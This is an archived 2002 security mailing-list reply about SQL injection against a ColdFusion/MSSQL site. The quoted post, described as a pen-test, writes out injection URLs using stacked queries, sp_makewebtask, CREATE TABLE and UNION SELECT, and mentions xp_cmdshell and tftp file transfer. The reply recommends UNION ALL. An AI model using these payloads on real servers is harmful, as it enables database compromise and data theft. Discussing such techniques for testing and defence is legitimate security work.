Re: SQL INJECTION IN Coldfusion

From: Cesar (cesarc56at_private)
Date: Fri Sep 13 2002 - 19:04:37 PDT

Next message: fedaikinat_private: "Re : finding ethereal"

Previous message: Lord High Fixer: "RE: Handheld Wireless Device and Card"
In reply to: Mr Ro: "SQL INJECTION IN Coldfusion"
Next in thread: wirepair: "Re: SQL INJECTION IN Coldfusion"
Reply: wirepair: "Re: SQL INJECTION IN Coldfusion"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi.
You must use UNION ALL  to get all the rows.

For new techniques take a look a this paper:

Manipulating MS Sql Server using sql injection.
http://www.appsecinc.com/news/briefing.html#inject

Cesar.

--- Mr Ro <vnmrroat_private> wrote:
> hello pen-tester,
> I am dealing with a pen-test agains a CFM server
> with
> MSSQL as backend. It is vulnerable with direct SQL
> injection.
> I figure out that I can create,drop...table, execute
> xp_cmdshell, sp_makewebtask, so i submit:
> submit:
> http://mysite/file.cfm?id=4546;exec sp_makewebtask
> "C:\winnt\temp\blah.htm","select * from
> master..sysmessages"--
> it's okay, and I want to get
> "C:\winnt\temp\blah.htm".
> I submit:
> http://mysite/file.cfm?id=4567;create table blah
> (line
> varchar(8000))--
> and then, I submit:
> http://mysite/file.cfm?id=4567 UNION SELECT line
> from
> mrro--
> it returns an error complain that "All queries in an
> SQL statement containing a UNION operator must have
> an
> equal number of expressions in their target lists."
> so
> I keep adding "line" in my request url
> (http://mysite/file.cfm?id=4567 UNION SELECT
> line,line,line from mrro--), finally it returns an
> error message like this:
> "[Microsoft][ODBC SQL Server Driver][SQL Server]The
> text, ntext, or image data type cannot be selected
> as
> DISTINCT."
> question here: who can explain me what happened ? 
> 
> I know there is another way to download or upload
> files using "tftp", so is there any free "tftp"
> server
> for me to use instead of installing a new one ? 
> thank for reading.
> best regards
> mrro
> 
> __________________________________________________
> Do you Yahoo!?
> Yahoo! News - Today's headlines
> http://news.yahoo.com
> 
>
----------------------------------------------------------------------------
> This list is provided by the SecurityFocus Security
> Intelligence Alert (SIA)
> Service. For more information on SecurityFocus' SIA
> service which
> automatically alerts you to the latest security
> vulnerabilities please see:
> https://alerts.securityfocus.com/
> 


__________________________________________________
Do you Yahoo!?
Yahoo! News - Today's headlines
http://news.yahoo.com

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

Next message: fedaikinat_private: "Re : finding ethereal"
Previous message: Lord High Fixer: "RE: Handheld Wireless Device and Card"
In reply to: Mr Ro: "SQL INJECTION IN Coldfusion"
Next in thread: wirepair: "Re: SQL INJECTION IN Coldfusion"
Reply: wirepair: "Re: SQL INJECTION IN Coldfusion"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Sep 16 2002 - 21:46:55 PDT